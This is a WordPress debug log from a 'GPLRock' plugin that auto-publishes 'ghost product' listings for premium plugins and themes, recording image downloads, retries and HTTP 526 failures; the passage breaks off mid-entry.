woocommerce-lead-time [05-Apr-2026 20:23:37 UTC] GPLRock: Image downloaded successfully for product xforwoocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e53b262.jpg [05-Apr-2026 20:23:37 UTC] GPLRock: Using pre-downloaded image for product xforwoocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e53b262.jpg [05-Apr-2026 20:23:37 UTC] GPLRock: Ghost product published with image - Product ID: xforwoocommerce [05-Apr-2026 20:23:39 UTC] GPLRock: Image downloaded successfully for product eventon-wordpress-event-calendar-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3237019c.jpg [05-Apr-2026 20:23:39 UTC] GPLRock: Using pre-downloaded image for product eventon-wordpress-event-calendar-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3237019c.jpg [05-Apr-2026 20:23:39 UTC] GPLRock: Ghost product published with image - Product ID: eventon-wordpress-event-calendar-plugin [05-Apr-2026 20:24:41 UTC] GPLRock: Image downloaded successfully for product elmastudio-nori-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-35148117.jpg [05-Apr-2026 20:24:41 UTC] GPLRock: Using pre-downloaded image for product elmastudio-nori-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-35148117.jpg [05-Apr-2026 20:24:41 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-nori-wordpress-theme [05-Apr-2026 20:24:43 UTC] GPLRock: Image downloaded successfully for product css-igniter-aegean-resort-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09fe7d8a.jpg [05-Apr-2026 20:24:43 UTC] GPLRock: Using pre-downloaded image for product css-igniter-aegean-resort-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09fe7d8a.jpg [05-Apr-2026 20:24:43 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-aegean-resort-wordpress-theme [05-Apr-2026 20:24:45 UTC] GPLRock: Image downloaded successfully for product userpro-tags-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46d2de50.jpg [05-Apr-2026 20:24:45 UTC] GPLRock: Using pre-downloaded image for product userpro-tags-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46d2de50.jpg [05-Apr-2026 20:24:45 UTC] GPLRock: Ghost product published with image - Product ID: userpro-tags-add-on [05-Apr-2026 20:24:46 UTC] GPLRock: Image downloaded successfully for product wpforms-aweber (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20e57246.jpg [05-Apr-2026 20:24:46 UTC] GPLRock: Using pre-downloaded image for product wpforms-aweber: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20e57246.jpg [05-Apr-2026 20:24:47 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-aweber [05-Apr-2026 20:24:48 UTC] GPLRock: Image downloaded successfully for product powerful-filters-for-wpdatatables (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-09792dbc.jpg [05-Apr-2026 20:24:48 UTC] GPLRock: Using pre-downloaded image for product powerful-filters-for-wpdatatables: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-09792dbc.jpg [05-Apr-2026 20:24:48 UTC] GPLRock: Ghost product published with image - Product ID: powerful-filters-for-wpdatatables [05-Apr-2026 20:24:50 UTC] GPLRock: Image downloaded successfully for product css-igniter-factum-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6b79b0ea.jpg [05-Apr-2026 20:24:50 UTC] GPLRock: Using pre-downloaded image for product css-igniter-factum-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6b79b0ea.jpg [05-Apr-2026 20:24:50 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-factum-wordpress-theme [05-Apr-2026 20:24:51 UTC] GPLRock: Image downloaded successfully for product mainwp-clone (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48c36a0a.jpg [05-Apr-2026 20:24:51 UTC] GPLRock: Using pre-downloaded image for product mainwp-clone: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48c36a0a.jpg [05-Apr-2026 20:24:51 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-clone [05-Apr-2026 20:24:52 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-mailchimp-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67d10ef9.jpg [05-Apr-2026 20:24:53 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-mailchimp-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67d10ef9.jpg [05-Apr-2026 20:24:53 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-mailchimp-integration [05-Apr-2026 20:24:54 UTC] GPLRock: Image downloaded successfully for product formidable-forms-mailchimp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-078b56c9.jpg [05-Apr-2026 20:24:54 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-mailchimp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-078b56c9.jpg [05-Apr-2026 20:24:54 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-mailchimp [05-Apr-2026 20:24:55 UTC] GPLRock: Image downloaded successfully for product woocommerce-email-attachments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4721f811.jpg [05-Apr-2026 20:24:56 UTC] GPLRock: Using pre-downloaded image for product woocommerce-email-attachments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4721f811.jpg [05-Apr-2026 20:24:56 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-email-attachments [05-Apr-2026 20:26:16 UTC] GPLRock: Image downloaded successfully for product insecta-pest-control-disinfection-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58e5458e.webp [05-Apr-2026 20:26:16 UTC] GPLRock: Using pre-downloaded image for product insecta-pest-control-disinfection-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58e5458e.webp [05-Apr-2026 20:26:16 UTC] GPLRock: Ghost product published with image - Product ID: insecta-pest-control-disinfection-elementor-template-kit [05-Apr-2026 20:26:17 UTC] GPLRock: Image download failed for product insigne-financial-business-investment-elementor-template-kit (attempt 1/3). HTTP Code: 200, Error: . Retrying... [05-Apr-2026 20:26:20 UTC] GPLRock: Image download failed for product insigne-financial-business-investment-elementor-template-kit (attempt 2/3). HTTP Code: 200, Error: . Retrying... [05-Apr-2026 20:26:23 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/Insigne-Financial-Business-Investment-Elementor-Template-Kit.webp for product insigne-financial-business-investment-elementor-template-kit after 3 attempts. HTTP Code: 200, Error: [05-Apr-2026 20:26:24 UTC] GPLRock: Image download failed for product insigne-financial-business-investment-elementor-template-kit (attempt 1/3). HTTP Code: 200, Error: . Retrying... [05-Apr-2026 20:26:27 UTC] GPLRock: Image download failed for product insigne-financial-business-investment-elementor-template-kit (attempt 2/3). HTTP Code: 200, Error: . Retrying... [05-Apr-2026 20:26:31 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/Insigne-Financial-Business-Investment-Elementor-Template-Kit.webp for product insigne-financial-business-investment-elementor-template-kit after 3 attempts. HTTP Code: 200, Error: [05-Apr-2026 20:26:31 UTC] GPLRock WARNING: Image download failed for product insigne-financial-business-investment-elementor-template-kit. URL: https://www.gplrock.com/wp-content/uploads/2023/12/Insigne-Financial-Business-Investment-Elementor-Template-Kit.webp [05-Apr-2026 20:26:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: insigne-financial-business-investment-elementor-template-kit [05-Apr-2026 20:26:32 UTC] GPLRock: Image downloaded successfully for product ingenism-architectural-design-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a9108498.webp [05-Apr-2026 20:26:32 UTC] GPLRock: Using pre-downloaded image for product ingenism-architectural-design-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a9108498.webp [05-Apr-2026 20:26:32 UTC] GPLRock: Ghost product published with image - Product ID: ingenism-architectural-design-agency-elementor-template-kit [05-Apr-2026 20:26:33 UTC] GPLRock: Image downloaded successfully for product infosco-data-science-analytic-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dcd58459.webp [05-Apr-2026 20:26:33 UTC] GPLRock: Using pre-downloaded image for product infosco-data-science-analytic-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dcd58459.webp [05-Apr-2026 20:26:33 UTC] GPLRock: Ghost product published with image - Product ID: infosco-data-science-analytic-service-elementor-template-kit [05-Apr-2026 20:26:35 UTC] GPLRock: Image downloaded successfully for product influos-influencer-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8377038.webp [05-Apr-2026 20:26:35 UTC] GPLRock: Using pre-downloaded image for product influos-influencer-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8377038.webp [05-Apr-2026 20:26:35 UTC] GPLRock: Ghost product published with image - Product ID: influos-influencer-agency-elementor-template-kit [05-Apr-2026 20:26:36 UTC] GPLRock: Image downloaded successfully for product infinity-fashion-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c65a97a2.webp [05-Apr-2026 20:26:36 UTC] GPLRock: Using pre-downloaded image for product infinity-fashion-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c65a97a2.webp [05-Apr-2026 20:26:36 UTC] GPLRock: Ghost product published with image - Product ID: infinity-fashion-woocommerce-elementor-template-kit [05-Apr-2026 20:26:38 UTC] GPLRock: Image downloaded successfully for product infiniterent-car-rental-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cf81871a.webp [05-Apr-2026 20:26:38 UTC] GPLRock: Using pre-downloaded image for product infiniterent-car-rental-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cf81871a.webp [05-Apr-2026 20:26:38 UTC] GPLRock: Ghost product published with image - Product ID: infiniterent-car-rental-elementor-template-kit [05-Apr-2026 20:26:39 UTC] GPLRock: Image downloaded successfully for product inexus-broadband-internet-service-provider-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8cc046d7.webp [05-Apr-2026 20:26:39 UTC] GPLRock: Using pre-downloaded image for product inexus-broadband-internet-service-provider-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8cc046d7.webp [05-Apr-2026 20:26:39 UTC] GPLRock: Ghost product published with image - Product ID: inexus-broadband-internet-service-provider-elementor-template-kit [05-Apr-2026 20:26:41 UTC] GPLRock: Image downloaded successfully for product indev-portfolio-elementor-template-kit-for-developer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-481eb6b6.webp [05-Apr-2026 20:26:41 UTC] GPLRock: Using pre-downloaded image for product indev-portfolio-elementor-template-kit-for-developer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-481eb6b6.webp [05-Apr-2026 20:26:41 UTC] GPLRock: Ghost product published with image - Product ID: indev-portfolio-elementor-template-kit-for-developer [05-Apr-2026 20:26:42 UTC] GPLRock: Image downloaded successfully for product inbusiness-coaching-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82691e9d.webp [05-Apr-2026 20:26:42 UTC] GPLRock: Using pre-downloaded image for product inbusiness-coaching-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82691e9d.webp [05-Apr-2026 20:26:42 UTC] GPLRock: Ghost product published with image - Product ID: inbusiness-coaching-business-elementor-template-kit [05-Apr-2026 20:29:12 UTC] GPLRock: Image download failed for product struktur-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:14 UTC] GPLRock: Image download failed for product struktur-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/struktur---creative-agency-wordpress-theme-26922.webp for product struktur-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:16 UTC] GPLRock: Image download failed for product struktur-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:19 UTC] GPLRock: Image download failed for product struktur-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/struktur---creative-agency-wordpress-theme-26922.webp for product struktur-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:21 UTC] GPLRock WARNING: Image download failed for product struktur-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/struktur---creative-agency-wordpress-theme-26922.webp [05-Apr-2026 20:29:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: struktur-creative-agency-wordpress-theme [05-Apr-2026 20:29:21 UTC] GPLRock: Image download failed for product fixora-saas-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:23 UTC] GPLRock: Image download failed for product fixora-saas-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fixora---saas--startup-wordpress-theme-20671.webp for product fixora-saas-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:25 UTC] GPLRock: Image download failed for product fixora-saas-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:27 UTC] GPLRock: Image download failed for product fixora-saas-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fixora---saas--startup-wordpress-theme-20671.webp for product fixora-saas-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:29 UTC] GPLRock WARNING: Image download failed for product fixora-saas-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fixora---saas--startup-wordpress-theme-20671.webp [05-Apr-2026 20:29:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fixora-saas-startup-wordpress-theme [05-Apr-2026 20:29:30 UTC] GPLRock: Image download failed for product black-creative-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:32 UTC] GPLRock: Image download failed for product black-creative-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/black---creative-digital-agency-wordpress-theme-8584.webp for product black-creative-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:34 UTC] GPLRock: Image download failed for product black-creative-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:36 UTC] GPLRock: Image download failed for product black-creative-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/black---creative-digital-agency-wordpress-theme-8584.webp for product black-creative-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:38 UTC] GPLRock WARNING: Image download failed for product black-creative-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/black---creative-digital-agency-wordpress-theme-8584.webp [05-Apr-2026 20:29:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: black-creative-digital-agency-wordpress-theme [05-Apr-2026 20:29:38 UTC] GPLRock: Image download failed for product rocket-board-metro-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:40 UTC] GPLRock: Image download failed for product rocket-board-metro-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rocket-board---metro-wordpress-theme-18467.webp for product rocket-board-metro-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:43 UTC] GPLRock: Image download failed for product rocket-board-metro-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:45 UTC] GPLRock: Image download failed for product rocket-board-metro-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rocket-board---metro-wordpress-theme-18467.webp for product rocket-board-metro-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:47 UTC] GPLRock WARNING: Image download failed for product rocket-board-metro-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rocket-board---metro-wordpress-theme-18467.webp [05-Apr-2026 20:29:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rocket-board-metro-wordpress-theme [05-Apr-2026 20:29:47 UTC] GPLRock: Image download failed for product pixion-developer-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:49 UTC] GPLRock: Image download failed for product pixion-developer-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pixion---developer-portfolio-wordpress-theme-8546.webp for product pixion-developer-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:51 UTC] GPLRock: Image download failed for product pixion-developer-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:53 UTC] GPLRock: Image download failed for product pixion-developer-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pixion---developer-portfolio-wordpress-theme-8546.webp for product pixion-developer-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:29:56 UTC] GPLRock WARNING: Image download failed for product pixion-developer-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pixion---developer-portfolio-wordpress-theme-8546.webp [05-Apr-2026 20:29:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pixion-developer-portfolio-wordpress-theme [05-Apr-2026 20:29:56 UTC] GPLRock: Image download failed for product mag4u-responsive-wordpress-news-magazine-blog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:29:58 UTC] GPLRock: Image download failed for product mag4u-responsive-wordpress-news-magazine-blog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mag4u---responsive-wordpress-news-magazine-blog-19173.webp for product mag4u-responsive-wordpress-news-magazine-blog after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:00 UTC] GPLRock: Image download failed for product mag4u-responsive-wordpress-news-magazine-blog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:02 UTC] GPLRock: Image download failed for product mag4u-responsive-wordpress-news-magazine-blog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mag4u---responsive-wordpress-news-magazine-blog-19173.webp for product mag4u-responsive-wordpress-news-magazine-blog after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:04 UTC] GPLRock WARNING: Image download failed for product mag4u-responsive-wordpress-news-magazine-blog. URL: https://meldwp.com/wp-content/uploads/mag4u---responsive-wordpress-news-magazine-blog-19173.webp [05-Apr-2026 20:30:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mag4u-responsive-wordpress-news-magazine-blog [05-Apr-2026 20:30:04 UTC] GPLRock: Image download failed for product pepeka-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:07 UTC] GPLRock: Image download failed for product pepeka-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pepeka---woocommerce-theme-19333.webp for product pepeka-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:09 UTC] GPLRock: Image download failed for product pepeka-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:11 UTC] GPLRock: Image download failed for product pepeka-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pepeka---woocommerce-theme-19333.webp for product pepeka-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:13 UTC] GPLRock WARNING: Image download failed for product pepeka-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/pepeka---woocommerce-theme-19333.webp [05-Apr-2026 20:30:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pepeka-woocommerce-theme [05-Apr-2026 20:30:13 UTC] GPLRock: Image download failed for product veliki-ai-big-data-analytics-machine-learning-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:15 UTC] GPLRock: Image download failed for product veliki-ai-big-data-analytics-machine-learning-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veliki---ai-big-data-analytics--machine-learning-elementor-wordpress-theme-25298.webp for product veliki-ai-big-data-analytics-machine-learning-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:17 UTC] GPLRock: Image download failed for product veliki-ai-big-data-analytics-machine-learning-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:20 UTC] GPLRock: Image download failed for product veliki-ai-big-data-analytics-machine-learning-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veliki---ai-big-data-analytics--machine-learning-elementor-wordpress-theme-25298.webp for product veliki-ai-big-data-analytics-machine-learning-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:22 UTC] GPLRock WARNING: Image download failed for product veliki-ai-big-data-analytics-machine-learning-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/veliki---ai-big-data-analytics--machine-learning-elementor-wordpress-theme-25298.webp [05-Apr-2026 20:30:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: veliki-ai-big-data-analytics-machine-learning-elementor-wordpress-theme [05-Apr-2026 20:30:22 UTC] GPLRock: Image download failed for product squareroot-wordpress-resume-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:24 UTC] GPLRock: Image download failed for product squareroot-wordpress-resume-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/squareroot---wordpress-resume-theme-30509.webp for product squareroot-wordpress-resume-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:26 UTC] GPLRock: Image download failed for product squareroot-wordpress-resume-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:28 UTC] GPLRock: Image download failed for product squareroot-wordpress-resume-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/squareroot---wordpress-resume-theme-30509.webp for product squareroot-wordpress-resume-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:30 UTC] GPLRock WARNING: Image download failed for product squareroot-wordpress-resume-theme. URL: https://meldwp.com/wp-content/uploads/squareroot---wordpress-resume-theme-30509.webp [05-Apr-2026 20:30:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: squareroot-wordpress-resume-theme [05-Apr-2026 20:30:31 UTC] GPLRock: Image download failed for product industris-factory-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:33 UTC] GPLRock: Image download failed for product industris-factory-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/industris---factory--business-wordpress-theme-18769.webp for product industris-factory-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:35 UTC] GPLRock: Image download failed for product industris-factory-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:37 UTC] GPLRock: Image download failed for product industris-factory-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:30:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/industris---factory--business-wordpress-theme-18769.webp for product industris-factory-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:30:39 UTC] GPLRock WARNING: Image download failed for product industris-factory-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/industris---factory--business-wordpress-theme-18769.webp [05-Apr-2026 20:30:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: industris-factory-business-wordpress-theme [05-Apr-2026 20:31:01 UTC] GPLRock: Image downloaded successfully for product janelas-windows-doors-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e82d925e.jpg [05-Apr-2026 20:31:01 UTC] GPLRock: Using pre-downloaded image for product janelas-windows-doors-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e82d925e.jpg [05-Apr-2026 20:31:01 UTC] GPLRock: Ghost product published with image - Product ID: janelas-windows-doors-services-elementor-template-kit [05-Apr-2026 20:31:03 UTC] GPLRock: Image downloaded successfully for product jamaah-mosque-islamic-center-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24e0ebf3.webp [05-Apr-2026 20:31:03 UTC] GPLRock: Using pre-downloaded image for product jamaah-mosque-islamic-center-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24e0ebf3.webp [05-Apr-2026 20:31:03 UTC] GPLRock: Ghost product published with image - Product ID: jamaah-mosque-islamic-center-elementor-template-kit [05-Apr-2026 20:31:04 UTC] GPLRock: Image downloaded successfully for product jagga-real-estate-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95f938ec.jpg [05-Apr-2026 20:31:05 UTC] GPLRock: Using pre-downloaded image for product jagga-real-estate-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95f938ec.jpg [05-Apr-2026 20:31:05 UTC] GPLRock: Ghost product published with image - Product ID: jagga-real-estate-template-kit [05-Apr-2026 20:31:06 UTC] GPLRock: Image downloaded successfully for product izpay-mobile-app-fintech-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-398c4538.webp [05-Apr-2026 20:31:06 UTC] GPLRock: Using pre-downloaded image for product izpay-mobile-app-fintech-startup-elementor-template-kit: 